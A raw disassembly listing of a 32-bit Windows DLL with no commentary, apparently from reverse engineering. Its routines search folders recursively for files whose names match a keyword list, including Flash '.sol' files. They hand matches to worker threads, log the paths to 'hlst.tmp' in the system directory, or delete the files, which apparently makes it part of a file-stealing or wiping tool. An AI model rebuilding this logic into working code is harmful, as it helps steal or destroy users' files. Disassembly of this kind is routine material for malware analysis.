call ds:CreateFileA ; CreateFileA
mov [ebp+hObject], eax
push 2 ; dwMoveMethod
push 0 ; lpDistanceToMoveHigh
push 0 ; lDistanceToMove
mov edx, [ebp+hObject]
push edx ; hFile
call ds:SetFilePointer ; SetFilePointer
push 0 ; lpOverlapped
lea eax, [ebp+NumberOfBytesWritten]
push eax ; lpNumberOfBytesWritten
lea ecx, [ebp+String2]
push ecx ; Str
call strlen ; strlen
add esp, 4
push eax ; nNumberOfBytesToWrite
lea edx, [ebp+String2]
push edx ; lpBuffer
mov eax, [ebp+hObject]
push eax ; hFile
call ds:WriteFile ; WriteFile
push 0 ; lpOverlapped
lea ecx, [ebp+NumberOfBytesWritten]
push ecx ; lpNumberOfBytesWritten
push 2 ; nNumberOfBytesToWrite
push offset asc_10022C9C ; "\r\n"
mov edx, [ebp+hObject]
push edx ; hFile
call ds:WriteFile ; WriteFile
mov eax, [ebp+hObject]
push eax ; hObject
call ds:CloseHandle ; CloseHandle
loc_10007AD5: ; CODE XREF: sub_1000741F+627�j
cmp [ebp+arg_14], 2
jnz short loc_10007AE8
lea ecx, [ebp+String2]
push ecx ; lpFileName
call ds:DeleteFileA ; DeleteFileA
loc_10007AE8: ; CODE XREF: sub_1000741F+6BA�j
jmp short loc_10007AFE
; ---------------------------------------------------------------------------
loc_10007AEA: ; CODE XREF: sub_1000741F+4AF�j
mov edx, [ebp+var_A58]
add edx, 1
mov [ebp+var_A58], edx
jmp loc_1000788D
; ---------------------------------------------------------------------------
loc_10007AFE: ; CODE XREF: sub_1000741F+1C4�j
; sub_1000741F+1E1�j ...
lea eax, [ebp+FindFileData]
push eax ; lpFindFileData
mov ecx, [ebp+arg_C]
mov edx, [ebp+arg_8]
mov eax, [edx+ecx*4]
push eax ; hFindFile
call ds:FindNextFileA ; FindNextFileA
mov [ebp+var_814], eax
cmp [ebp+dwMilliseconds], 0
jz short loc_10007B2B
mov ecx, [ebp+dwMilliseconds]
push ecx ; dwMilliseconds
call ds:Sleep ; Sleep
loc_10007B2B: ; CODE XREF: sub_1000741F+700�j
jmp loc_100074DF
; ---------------------------------------------------------------------------
loc_10007B30: ; CODE XREF: sub_1000741F+BA�j
; sub_1000741F+C7�j
mov esp, ebp
pop ebp
retn
sub_1000741F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_10007B34(char *Str, int, int, LPCSTR lpString2, DWORD dwMilliseconds)
sub_10007B34 proc near ; CODE XREF: sub_10007B34+15D�p
; sub_1000A318+743�p ...
Buffer = byte ptr -0C54h
Dest = byte ptr -0B54h
var_A54 = dword ptr -0A54h
FindFileData = _WIN32_FIND_DATAA ptr -0A50h
String1 = byte ptr -910h
var_810 = dword ptr -810h
hObject = dword ptr -80Ch
String2 = byte ptr -808h
var_408 = dword ptr -408h
NumberOfBytesWritten= dword ptr -404h
FileName = byte ptr -400h
Str = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
lpString2 = dword ptr 14h
dwMilliseconds = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 0C54h
mov [ebp+var_810], 1
mov [ebp+var_A54], 0
mov [ebp+var_408], 0
push 5Ch ; Ch
mov eax, [ebp+Str]
push eax ; Str
call ds:strrchr ; strrchr
add esp, 8
add eax, 1
push eax ; lpString2
lea ecx, [ebp+String1]
push ecx ; lpString1
call ds:lstrcpyA ; lstrcpyA
mov edx, [ebp+Str]
push edx
push offset aS__1 ; "%s\\*.*"
lea eax, [ebp+FileName]
push eax ; Dest
call ds:sprintf ; sprintf
add esp, 0Ch
lea ecx, [ebp+FindFileData]
push ecx ; lpFindFileData
lea edx, [ebp+FileName]
push edx ; lpFileName
call ds:FindFirstFileA ; FindFirstFileA
mov ecx, dword_10034234
mov dword_10028200[ecx*4], eax
mov edx, dword_10034234
cmp dword_10028200[edx*4], 0FFFFFFFFh
jz loc_1000827B
loc_10007BC9: ; CODE XREF: sub_10007B34:loc_10008276�j
cmp [ebp+var_810], 0
jz loc_1000827B
mov eax, [ebp+FindFileData.dwFileAttributes]
and eax, 10h
test eax, eax
jz loc_10007CD7
push offset a__3 ; "."
lea ecx, [ebp+FindFileData.cFileName]
push ecx ; lpString1
call ds:lstrcmpA ; lstrcmpA
test eax, eax
jz loc_10007CD7
push offset a___1 ; ".."
lea edx, [ebp+FindFileData.cFileName]
push edx ; lpString1
call ds:lstrcmpA ; lstrcmpA
test eax, eax
jz loc_10007CD7
mov eax, dword_10034234
add eax, 1
mov dword_10034234, eax
push 0FFh ; Size
call ds:malloc ; malloc
add esp, 4
mov ecx, dword_10034234
mov lpBuffer[ecx*4], eax
lea edx, [ebp+FindFileData.cFileName]
push edx
mov eax, dword_10034234
mov ecx, hHandle[eax*4]
push ecx
push offset aSS_7 ; "%s\\%s"
mov edx, dword_10034234
mov eax, lpBuffer[edx*4]
push eax ; Dest
call ds:sprintf ; sprintf
add esp, 10h
mov ecx, [ebp+dwMilliseconds]
push ecx ; dwMilliseconds
mov edx, [ebp+lpString2]
push edx ; lpString2
mov eax, [ebp+arg_8]
push eax ; int
mov ecx, [ebp+arg_4]
push ecx ; int
mov edx, dword_10034234
mov eax, lpBuffer[edx*4]
push eax ; Str
call sub_10007B34
add esp, 14h
mov ecx, dword_10034234
mov edx, dword_10028200[ecx*4]
push edx ; hFindFile
call ds:FindClose ; FindClose
mov eax, dword_10034234
mov ecx, lpBuffer[eax*4]
push ecx ; Memory
call ds:free ; free
add esp, 4
mov edx, dword_10034234
sub edx, 1
mov dword_10034234, edx
jmp loc_10008245
; ---------------------------------------------------------------------------
loc_10007CD7: ; CODE XREF: sub_10007B34+AD�j
; sub_10007B34+C7�j ...
mov eax, [ebp+FindFileData.dwFileAttributes]
and eax, 10h
test eax, eax
jnz loc_10008245
lea ecx, [ebp+FindFileData.cFileName]
push ecx
mov edx, dword_10034234
mov eax, lpBuffer[edx*4]
push eax
push offset aSS_8 ; "%s\\%s"
lea ecx, [ebp+String2]
push ecx ; Dest
call ds:sprintf ; sprintf
add esp, 10h
mov [ebp+var_408], 0
loc_10007D1C: ; CODE XREF: sub_10007B34+213�j
mov edx, [ebp+var_408]
cmp dword_1004B770[edx*4], 0
jz short loc_10007D49
cmp [ebp+var_408], 1000h
jnb short loc_10007D49
mov eax, [ebp+var_408]
add eax, 1
mov [ebp+var_408], eax
jmp short loc_10007D1C
; ---------------------------------------------------------------------------
loc_10007D49: ; CODE XREF: sub_10007B34+1F6�j
; sub_10007B34+202�j
cmp [ebp+arg_4], 0
jz short loc_10007D5B
mov ecx, [ebp+arg_4]
cmp dword ptr [ecx], 0
jnz loc_10007F90
loc_10007D5B: ; CODE XREF: sub_10007B34+219�j
cmp [ebp+arg_8], 0
jz short loc_10007D6B
cmp [ebp+arg_8], 1
jnz loc_10007EC7
loc_10007D6B: ; CODE XREF: sub_10007B34+22B�j
cmp [ebp+var_408], 1000h
jnb loc_10007EC7
push 310h ; Size
call ds:malloc ; malloc
add esp, 4
mov edx, [ebp+var_408]
mov dword_1004B770[edx*4], eax
mov eax, [ebp+lpString2]
push eax ; lpString2
mov ecx, [ebp+var_408]
mov edx, dword_1004B770[ecx*4]
push edx ; lpString1
call ds:lstrcpyA ; lstrcpyA
mov eax, [ebp+var_408]
mov ecx, dword_1004B770[eax*4]
mov dword ptr [ecx+100h], 0
mov edx, [ebp+var_408]
mov eax, dword_1004B770[edx*4]
mov dword ptr [eax+104h], 0
lea ecx, [ebp+String2]
push ecx ; lpString2
mov edx, [ebp+var_408]
mov eax, dword_1004B770[edx*4]
add eax, 108h
push eax ; lpString1
call ds:lstrcpyA ; lstrcpyA
lea ecx, [ebp+FindFileData.cFileName]
push ecx
push offset byte_10065ED8
push offset aS__S_0 ; "%s__%s"
mov edx, [ebp+var_408]
mov eax, dword_1004B770[edx*4]
add eax, 207h
push eax ; Dest
call ds:sprintf ; sprintf
add esp, 10h
push offset a_sol_1 ; ".sol"
lea ecx, [ebp+FindFileData.cFileName]
push ecx ; Str
call ds:strstr ; strstr
add esp, 8
test eax, eax
jz short loc_10007E77
lea edx, [ebp+FindFileData.cFileName]
push edx
lea eax, [ebp+String1]
push eax
push offset byte_10065ED8
push offset aS__SS_1 ; "%s__%s&&%s"
mov ecx, [ebp+var_408]
mov edx, dword_1004B770[ecx*4]
add edx, 207h
push edx ; Dest
call ds:sprintf ; sprintf
add esp, 14h
loc_10007E77: ; CODE XREF: sub_10007B34+30C�j
mov eax, [ebp+var_408]
mov ecx, dword_1004B770[eax*4]
mov edx, [ebp+var_408]
mov [ecx+308h], edx
mov eax, [ebp+var_408]
mov ecx, dword_1004B770[eax*4]
mov edx, [ebp+arg_8]
mov [ecx+30Ch], edx
push 0 ; lpThreadId
push 0 ; dwCreationFlags
mov eax, [ebp+var_408]
mov ecx, dword_1004B770[eax*4]
push ecx ; lpParameter
push offset StartAddress ; lpStartAddress
push 0 ; dwStackSize
push 0 ; lpThreadAttributes
call ds:CreateThread ; CreateThread
loc_10007EC7: ; CODE XREF: sub_10007B34+231�j
; sub_10007B34+241�j
cmp [ebp+arg_8], 3
jnz loc_10007F8B
push 0FFh ; uSize
lea edx, [ebp+Dest]
push edx ; lpBuffer
call ds:GetSystemDirectoryA ; GetSystemDirectoryA
lea eax, [ebp+Dest]
push eax
push offset aSHlst_tmp ; "%s\\hlst.tmp"
lea ecx, [ebp+Dest]
push ecx ; Dest
call ds:sprintf ; sprintf
add esp, 0Ch
push 0 ; hTemplateFile
push 0 ; dwFlagsAndAttributes
push 4 ; dwCreationDisposition
push 0 ; lpSecurityAttributes
push 1 ; dwShareMode
push 40000000h ; dwDesiredAccess
lea edx, [ebp+Dest]
push edx ; lpFileName
call ds:CreateFileA ; CreateFileA
mov [ebp+hObject], eax
push 2 ; dwMoveMethod
push 0 ; lpDistanceToMoveHigh
push 0 ; lDistanceToMove
mov eax, [ebp+hObject]
push eax ; hFile
call ds:SetFilePointer ; SetFilePointer
push 0 ; lpOverlapped
lea ecx, [ebp+NumberOfBytesWritten]
push ecx ; lpNumberOfBytesWritten
lea edx, [ebp+String2]
push edx ; Str
call strlen ; strlen
add esp, 4
push eax ; nNumberOfBytesToWrite
lea eax, [ebp+String2]
push eax ; lpBuffer
mov ecx, [ebp+hObject]
push ecx ; hFile
call ds:WriteFile ; WriteFile
push 0 ; lpOverlapped
lea edx, [ebp+NumberOfBytesWritten]
push edx ; lpNumberOfBytesWritten
push 2 ; nNumberOfBytesToWrite
push offset asc_10022CE8 ; "\r\n"
mov eax, [ebp+hObject]
push eax ; hFile
call ds:WriteFile ; WriteFile
mov ecx, [ebp+hObject]
push ecx ; hObject
call ds:CloseHandle ; CloseHandle
loc_10007F8B: ; CODE XREF: sub_10007B34+397�j
jmp loc_10008245
; ---------------------------------------------------------------------------
loc_10007F90: ; CODE XREF: sub_10007B34+221�j
mov [ebp+var_A54], 0
loc_10007F9A: ; CODE XREF: sub_10007B34+70C�j
mov edx, [ebp+var_A54]
mov eax, [ebp+arg_4]
cmp dword ptr [eax+edx*4], 0
jz loc_10008245
cmp [ebp+var_A54], 1000h
jnb loc_10008245
mov ecx, [ebp+var_A54]
mov edx, [ebp+arg_4]
mov eax, [edx+ecx*4]
push eax ; SubStr
lea ecx, [ebp+String2]
push ecx ; Str
call ds:_strlwr ; _strlwr
add esp, 4
push eax ; Str
call ds:strstr ; strstr
add esp, 8
test eax, eax
jz loc_10008231
cmp [ebp+arg_8], 0
jz short loc_10007FFC
cmp [ebp+arg_8], 1
jnz loc_10008158
loc_10007FFC: ; CODE XREF: sub_10007B34+4BC�j
cmp [ebp+var_408], 1000h
jnb loc_10008158
push 310h ; Size
call ds:malloc ; malloc
add esp, 4
mov edx, [ebp+var_408]
mov dword_1004B770[edx*4], eax
mov eax, [ebp+lpString2]
push eax ; lpString2
mov ecx, [ebp+var_408]
mov edx, dword_1004B770[ecx*4]
push edx ; lpString1
call ds:lstrcpyA ; lstrcpyA
mov eax, [ebp+var_408]
mov ecx, dword_1004B770[eax*4]
mov dword ptr [ecx+100h], 0
mov edx, [ebp+var_408]
mov eax, dword_1004B770[edx*4]
mov dword ptr [eax+104h], 0
lea ecx, [ebp+String2]
push ecx ; lpString2
mov edx, [ebp+var_408]
mov eax, dword_1004B770[edx*4]
add eax, 108h
push eax ; lpString1
call ds:lstrcpyA ; lstrcpyA
lea ecx, [ebp+FindFileData.cFileName]
push ecx
push offset byte_10065ED8
push offset aS__S_1 ; "%s__%s"
mov edx, [ebp+var_408]
mov eax, dword_1004B770[edx*4]
add eax, 207h
push eax ; Dest
call ds:sprintf ; sprintf
add esp, 10h
push offset a_sol_2 ; ".sol"
lea ecx, [ebp+FindFileData.cFileName]
push ecx ; Str
call ds:strstr ; strstr
add esp, 8
test eax, eax
jz short loc_10008108
lea edx, [ebp+FindFileData.cFileName]
push edx
lea eax, [ebp+String1]
push eax
push offset byte_10065ED8
push offset aS__SS_2 ; "%s__%s&&%s"
mov ecx, [ebp+var_408]
mov edx, dword_1004B770[ecx*4]
add edx, 207h
push edx ; Dest
call ds:sprintf ; sprintf
add esp, 14h
loc_10008108: ; CODE XREF: sub_10007B34+59D�j
mov eax, [ebp+var_408]
mov ecx, dword_1004B770[eax*4]
mov edx, [ebp+var_408]
mov [ecx+308h], edx
mov eax, [ebp+var_408]
mov ecx, dword_1004B770[eax*4]
mov edx, [ebp+arg_8]
mov [ecx+30Ch], edx
push 0 ; lpThreadId
push 0 ; dwCreationFlags
mov eax, [ebp+var_408]
mov ecx, dword_1004B770[eax*4]
push ecx ; lpParameter
push offset StartAddress ; lpStartAddress
push 0 ; dwStackSize
push 0 ; lpThreadAttributes
call ds:CreateThread ; CreateThread
loc_10008158: ; CODE XREF: sub_10007B34+4C2�j
; sub_10007B34+4D2�j
cmp [ebp+arg_8], 3
jnz loc_1000821C
push 0FFh ; uSize
lea edx, [ebp+Buffer]
push edx ; lpBuffer
call ds:GetSystemDirectoryA ; GetSystemDirectoryA
lea eax, [ebp+Buffer]
push eax
push offset aSHlst_tmp_0 ; "%s\\hlst.tmp"
lea ecx, [ebp+Buffer]
push ecx ; Dest
call ds:sprintf ; sprintf
add esp, 0Ch
push 0 ; hTemplateFile
push 0 ; dwFlagsAndAttributes
push 4 ; dwCreationDisposition
push 0 ; lpSecurityAttributes
push 1 ; dwShareMode
push 40000000h ; dwDesiredAccess
lea edx, [ebp+Buffer]
push edx ; lpFileName
call ds:CreateFileA ; CreateFileA
mov [ebp+hObject], eax
push 2 ; dwMoveMethod
push 0 ; lpDistanceToMoveHigh
push 0 ; lDistanceToMove
mov eax, [ebp+hObject]
push eax ; hFile
call ds:SetFilePointer ; SetFilePointer
push 0 ; lpOverlapped
lea ecx, [ebp+NumberOfBytesWritten]
push ecx ; lpNumberOfBytesWritten
lea edx, [ebp+String2]
push edx ; Str
call strlen ; strlen
add esp, 4
push eax ; nNumberOfBytesToWrite
lea eax, [ebp+String2]
push eax ; lpBuffer
mov ecx, [ebp+hObject]
push ecx ; hFile
call ds:WriteFile ; WriteFile
push 0 ; lpOverlapped
lea edx, [ebp+NumberOfBytesWritten]
push edx ; lpNumberOfBytesWritten
push 2 ; nNumberOfBytesToWrite
push offset asc_10022D14 ; "\r\n"
mov eax, [ebp+hObject]
push eax ; hFile
call ds:WriteFile ; WriteFile
mov ecx, [ebp+hObject]
push ecx ; hObject
call ds:CloseHandle ; CloseHandle
loc_1000821C: ; CODE XREF: sub_10007B34+628�j
cmp [ebp+arg_8], 2
jnz short loc_1000822F
lea edx, [ebp+String2]
push edx ; lpFileName
call ds:DeleteFileA ; DeleteFileA
loc_1000822F: ; CODE XREF: sub_10007B34+6EC�j
jmp short loc_10008245
; ---------------------------------------------------------------------------
loc_10008231: ; CODE XREF: sub_10007B34+4B2�j
mov eax, [ebp+var_A54]
add eax, 1
mov [ebp+var_A54], eax
jmp loc_10007F9A
; ---------------------------------------------------------------------------
loc_10008245: ; CODE XREF: sub_10007B34+19E�j
; sub_10007B34+1AE�j ...
lea ecx, [ebp+FindFileData]
push ecx ; lpFindFileData
mov edx, dword_10034234
mov eax, dword_10028200[edx*4]
push eax ; hFindFile
call ds:FindNextFileA ; FindNextFileA
mov [ebp+var_810], eax
cmp [ebp+dwMilliseconds], 0
jz short loc_10008276
mov ecx, [ebp+dwMilliseconds]
push ecx ; dwMilliseconds
call ds:Sleep ; Sleep
loc_10008276: ; CODE XREF: sub_10007B34+736�j
jmp loc_10007BC9
; ---------------------------------------------------------------------------
loc_1000827B: ; CODE XREF: sub_10007B34+8F�j
; sub_10007B34+9C�j
mov esp, ebp
pop ebp
retn
sub_10007B34 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_1000827F(char, void *lpString1, int, int, int, int)
sub_1000827F proc near ; CODE XREF: sub_1000878F+1D8�p
; sub_1000878F+2DD�p ...
var_D4 = dword ptr -0D4h
var_D0 = dword ptr -0D0h
var_CC = dword ptr -0CCh
var_C8 = dword ptr -0C8h
var_C4 = dword ptr -0C4h
var_C0 = dword ptr -0C0h
var_BC = dword ptr -0BCh
var_B8 = dword ptr -0B8h
var_B4 = dword ptr -0B4h
var_B0 = dword ptr -0B0h
var_AC = dword ptr -0ACh
var_A8 = dword ptr -0A8h
var_A4 = dword ptr -0A4h
var_A0 = dword ptr -0A0h
var_9C = dword ptr -9Ch
var_98 = dword ptr -98h
var_94 = dword ptr -94h
var_90 = dword ptr -90h
var_8C = dword ptr -8Ch
var_88 = dword ptr -88h
var_84 = dword ptr -84h
var_80 = dword ptr -80h
var_7C = dword ptr -7Ch
var_78 = dword ptr -78h
var_74 = dword ptr -74h
var_70 = byte ptr -70h
var_64 = byte ptr -64h
var_60 = byte ptr -60h
var_5C = byte ptr -5Ch
var_50 = byte ptr -50h
var_4C = byte ptr -4Ch
var_48 = byte ptr -48h
var_44 = byte ptr -44h
var_40 = byte ptr -40h
var_3C = byte ptr -3Ch
var_38 = byte ptr -38h
var_2C = byte ptr -2Ch
var_28 = byte ptr -28h
var_1C = byte ptr -1Ch
var_18 = byte ptr -18h
var_14 = byte ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
arg_0 = byte ptr 8
lpString1 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset SEH_1000827F
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 0C8h
mov [ebp+var_4], 0
cmp [ebp+arg_10], 0
jnz loc_10008493
cmp [ebp+arg_14], 0
jnz loc_1000838F
push 0
mov eax, [ebp+arg_C]
push eax
mov ecx, [ebp+arg_8]
push ecx
lea edx, [ebp+var_14]
push edx
lea ecx, [ebp+arg_0]
call sub_1001A97C
mov [ebp+var_78], eax
mov eax, [ebp+var_78]
mov [ebp+var_7C], eax
mov byte ptr [ebp+var_4], 1
mov ecx, [ebp+var_7C]
call sub_1001AA90
push eax ; lpString
call ds:lstrlenA ; lstrlenA
mov [ebp+var_10], eax
mov byte ptr [ebp+var_4], 0
lea ecx, [ebp+var_14]
call sub_1001A728
cmp [ebp+var_10], 0
jle short loc_10008371
mov ecx, [ebp+var_10]
add ecx, 1
push ecx ; Size
call ds:malloc ; malloc
add esp, 4
mov [ebp+lpString1], eax
mov edx, [ebp+var_10]
add edx, 1
push edx ; Size
push 0 ; Val
mov eax, [ebp+lpString1]
push eax ; Dst
call memset ; memset
add esp, 0Ch
push 0
mov ecx, [ebp+arg_C]
push ecx
mov edx, [ebp+arg_8]
push edx
lea eax, [ebp+var_18]
push eax
lea ecx, [ebp+arg_0]
call sub_1001A97C
mov [ebp+var_80], eax
mov ecx, [ebp+var_80]
mov [ebp+var_84], ecx
mov byte ptr [ebp+var_4], 2
mov ecx, [ebp+var_84]
call sub_1001AA90
push eax ; lpString2
mov edx, [ebp+lpString1]
push edx ; lpString1
call ds:lstrcpyA ; lstrcpyA
mov byte ptr [ebp+var_4], 0
lea ecx, [ebp+var_18]
call sub_1001A728
jmp short loc_1000838F
; ---------------------------------------------------------------------------
loc_10008371: ; CODE XREF: sub_1000827F+7E�j
push 2 ; Size
call ds:malloc ; malloc
add esp, 4
mov [ebp+lpString1], eax
push 2 ; Size
push 0 ; Val
mov eax, [ebp+lpString1]
push eax ; Dst
call memset ; memset
add esp, 0Ch
loc_1000838F: ; CODE XREF: sub_1000827F+33�j
; sub_1000827F+F0�j
cmp [ebp+arg_14], 1
jnz loc_1000848E
push 0
lea ecx, [ebp+var_28]
push ecx
mov edx, [ebp+arg_C]
push edx
mov eax, [ebp+arg_8]
push eax
lea ecx, [ebp+var_1C]
push ecx
lea ecx, [ebp+arg_0]
call sub_1001A97C
mov [ebp+var_88], eax
mov edx, [ebp+var_88]
mov [ebp+var_8C], edx
mov byte ptr [ebp+var_4], 3
mov ecx, [ebp+var_8C]
call sub_1001AA61
mov eax, [eax]
push eax ; lpString
call ds:lstrlenA ; lstrlenA
mov [ebp+var_10], eax
mov byte ptr [ebp+var_4], 0
lea ecx, [ebp+var_1C]
call sub_1001A728
cmp [ebp+var_10], 0
jle short loc_10008470
mov ecx, [ebp+var_10]
add ecx, 1
push ecx ; Size
call ds:malloc ; malloc
add esp, 4
mov [ebp+lpString1], eax
mov edx, [ebp+var_10]
add edx, 1
push edx ; Size
push 0 ; Val
mov eax, [ebp+lpString1]
push eax ; Dst
call memset ; memset
add esp, 0Ch
push 0
lea ecx, [ebp+var_38]
push ecx
mov edx, [ebp+arg_C]
push edx
mov eax, [ebp+arg_8]
push eax
lea ecx, [ebp+var_2C]
push ecx
lea ecx, [ebp+arg_0]
call sub_1001A97C
mov [ebp+var_90], eax
mov edx, [ebp+var_90]
mov [ebp+var_94], edx
mov byte ptr [ebp+var_4], 4
mov ecx, [ebp+var_94]
call sub_1001AA61
mov eax, [eax]
push eax ; lpString2
mov ecx, [ebp+lpString1]
push ecx ; lpString1
call ds:lstrcpyA ; lstrcpyA
mov byte ptr [ebp+var_4], 0
lea ecx, [ebp+var_2C]
call sub_1001A728
jmp short loc_1000848E
; ---------------------------------------------------------------------------
loc_10008470: ; CODE XREF: sub_1000827F+171�j
push 2 ; Size
call ds:malloc ; malloc
add esp, 4
mov [ebp+lpString1], eax
push 2 ; Size
push 0 ; Val
mov edx, [ebp+lpString1]
push edx ; Dst
call memset ; memset
add esp, 0Ch
loc_1000848E: ; CODE XREF: sub_1000827F+114�j
; sub_1000827F+1EF�j
jmp loc_10008769
; ---------------------------------------------------------------------------
loc_10008493: ; CODE XREF: sub_1000827F+29�j
cmp [ebp+arg_14], 0
jnz loc_100085F8
push 0
push 0
mov eax, [ebp+arg_10]
push eax
lea ecx, [ebp+var_40]
push ecx
mov edx, [ebp+arg_C]
push edx
mov eax, [ebp+arg_8]
push eax
lea ecx, [ebp+var_3C]
push ecx
lea ecx, [ebp+arg_0]
call sub_1001A97C
mov [ebp+var_98], eax
mov edx, [ebp+var_98]
mov [ebp+var_9C], edx
mov byte ptr [ebp+var_4], 5
mov ecx, [ebp+var_9C]
call sub_1001A916
mov [ebp+var_A0], eax
mov eax, [ebp+var_A0]
mov [ebp+var_A4], eax
mov byte ptr [ebp+var_4], 6
mov ecx, [ebp+var_A4]
call sub_1001AA90
push eax ; lpString
call ds:lstrlenA ; lstrlenA
mov [ebp+var_10], eax
mov byte ptr [ebp+var_4], 5
lea ecx, [ebp+var_40]
call sub_1001A728
mov byte ptr [ebp+var_4], 0
lea ecx, [ebp+var_3C]
call sub_1001A728
cmp [ebp+var_10], 0
jle loc_100085DA
mov ecx, [ebp+var_10]
add ecx, 1
push ecx ; Size
call ds:malloc ; malloc
add esp, 4
mov [ebp+lpString1], eax
mov edx, [ebp+var_10]
add edx, 1
push edx ; Size
push 0 ; Val
mov eax, [ebp+lpString1]
push eax ; Dst
call memset ; memset
add esp, 0Ch
push 0
push 0
mov ecx, [ebp+arg_10]
push ecx
lea edx, [ebp+var_48]
push edx
mov eax, [ebp+arg_C]
push eax
mov ecx, [ebp+arg_8]
push ecx
lea edx, [ebp+var_44]
push edx
lea ecx, [ebp+arg_0]
call sub_1001A97C
mov [ebp+var_A8], eax
mov eax, [ebp+var_A8]
mov [ebp+var_AC], eax
mov byte ptr [ebp+var_4], 7
mov ecx, [ebp+var_AC]
call sub_1001A916
mov [ebp+var_B0], eax
mov ecx, [ebp+var_B0]
mov [ebp+var_B4], ecx
mov byte ptr [ebp+var_4], 8
mov ecx, [ebp+var_B4]
call sub_1001AA90
push eax ; lpString2
mov edx, [ebp+lpString1]
push edx ; lpString1
call ds:lstrcpyA ; lstrcpyA
mov byte ptr [ebp+var_4], 7
lea ecx, [ebp+var_48]
call sub_1001A728
mov byte ptr [ebp+var_4], 0
lea ecx, [ebp+var_44]
call sub_1001A728
jmp short loc_100085F8
; ---------------------------------------------------------------------------
loc_100085DA: ; CODE XREF: sub_1000827F+2A6�j
push 2 ; Size
call ds:malloc ; malloc
add esp, 4
mov [ebp+lpString1], eax
push 2 ; Size
push 0 ; Val
mov eax, [ebp+lpString1]
push eax ; Dst
call memset ; memset
add esp, 0Ch
loc_100085F8: ; CODE XREF: sub_1000827F+218�j
; sub_1000827F+359�j
cmp [ebp+arg_14], 1
jnz loc_10008769
push 0
lea ecx, [ebp+var_5C]
push ecx
push 0
mov edx, [ebp+arg_10]
push edx
lea eax, [ebp+var_50]
push eax
mov ecx, [ebp+arg_C]
push ecx
mov edx, [ebp+arg_8]
push edx
lea eax, [ebp+var_4C]
push eax
lea ecx, [ebp+arg_0]
call sub_1001A97C
mov [ebp+var_B8], eax
mov ecx, [ebp+var_B8]
mov [ebp+var_BC], ecx
mov byte ptr [ebp+var_4], 9
mov ecx, [ebp+var_BC]
call sub_1001A916
mov [ebp+var_C0], eax
mov edx, [ebp+var_C0]
mov [ebp+var_C4], edx
mov byte ptr [ebp+var_4], 0Ah
mov ecx, [ebp+var_C4]
call sub_1001AA61
mov eax, [eax]
push eax ; lpString
call ds:lstrlenA ; lstrlenA
mov [ebp+var_10], eax
mov byte ptr [ebp+var_4], 9
lea ecx, [ebp+var_50]
call sub_1001A728
mov byte ptr [ebp+var_4], 0
lea ecx, [ebp+var_4C]
call sub_1001A728
cmp [ebp+var_10], 0
jle loc_1000874B
mov ecx, [ebp+var_10]
add ecx, 1
push ecx ; Size
call ds:malloc ; malloc
add esp, 4
mov [ebp+lpString1], eax
mov edx, [ebp+var_10]
add edx, 1
push edx ; Size
push 0 ; Val
mov eax, [ebp+lpString1]
push eax ; Dst
call memset ; memset
add esp, 0Ch
push 0
lea ecx, [ebp+var_70]
push ecx
push 0
mov edx, [ebp+arg_10]
push edx
lea eax, [ebp+var_64]
push eax
mov ecx, [ebp+arg_C]
push ecx
mov edx, [ebp+arg_8]
push edx
lea eax, [ebp+var_60]
push eax
lea ecx, [ebp+arg_0]
call sub_1001A97C
mov [ebp+var_C8], eax
mov ecx, [ebp+var_C8]
mov [ebp+var_CC], ecx
mov byte ptr [ebp+var_4], 0Bh
mov ecx, [ebp+var_CC]
call sub_1001A916
mov [ebp+var_D0], eax
mov edx, [ebp+var_D0]
mov [ebp+var_D4], edx
mov byte ptr [ebp+var_4], 0Ch
mov ecx, [ebp+var_D4]
call sub_1001AA61
mov eax, [eax]
push eax ; lpString2
mov ecx, [ebp+lpString1]
push ecx ; lpString1
call ds:lstrcpyA ; lstrcpyA
mov byte ptr [ebp+var_4], 0Bh
lea ecx, [ebp+var_64]
call sub_1001A728
mov byte ptr [ebp+var_4], 0
lea ecx, [ebp+var_60]
call sub_1001A728
jmp short loc_10008769
; ---------------------------------------------------------------------------
loc_1000874B: ; CODE XREF: sub_1000827F+411�j
push 2 ; Size
call ds:malloc ; malloc
add esp, 4
mov [ebp+lpString1], eax
push 2 ; Size
push 0 ; Val
mov edx, [ebp+lpString1]
push edx ; Dst
call memset ; memset
add esp, 0Ch
loc_10008769: ; CODE XREF: sub_1000827F:loc_1000848E�j
; sub_1000827F+37D�j ...
mov eax, [ebp+lpString1]
mov [ebp+var_74], eax
mov [ebp+var_4], 0FFFFFFFFh
lea ecx, [ebp+arg_0]
call sub_1001A728
mov eax, [ebp+var_74]
mov ecx, [ebp+var_C]
mov large fs:0, ecx
mov esp, ebp
pop ebp
retn
sub_1000827F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_1000878F(LPCSTR lpString2)
sub_1000878F proc near ; CODE XREF: sub_1000B7EF+103�p
var_4CC = dword ptr -4CCh
var_4C8 = dword ptr -4C8h
var_4C4 = dword ptr -4C4h
var_4C0 = dword ptr -4C0h
var_4BC = dword ptr -4BCh
var_4B8 = dword ptr -4B8h
var_4B4 = dword ptr -4B4h
var_4B0 = dword ptr -4B0h
var_4AC = dword ptr -4ACh
var_4A8 = dword ptr -4A8h
var_4A4 = dword ptr -4A4h
var_4A0 = dword ptr -4A0h
var_49C = dword ptr -49Ch
var_498 = dword ptr -498h
var_494 = dword ptr -494h
var_490 = dword ptr -490h
var_48C = dword ptr -48Ch
var_488 = dword ptr -488h
var_484 = dword ptr -484h
var_480 = dword ptr -480h
var_47C = dword ptr -47Ch
var_478 = dword ptr -478h
var_474 = dword ptr -474h
var_470 = dword ptr -470h
var_46C = dword ptr -46Ch
var_468 = dword ptr -468h
var_464 = dword ptr -464h
var_460 = dword ptr -460h
var_45C = dword ptr -45Ch
var_458 = dword ptr -458h
var_454 = dword ptr -454h
var_450 = dword ptr -450h
var_44C = dword ptr -44Ch
var_448 = dword ptr -448h
var_444 = byte ptr -444h
var_440 = dword ptr -440h
var_43C = dword ptr -43Ch
var_438 = dword ptr -438h
var_434 = byte ptr -434h
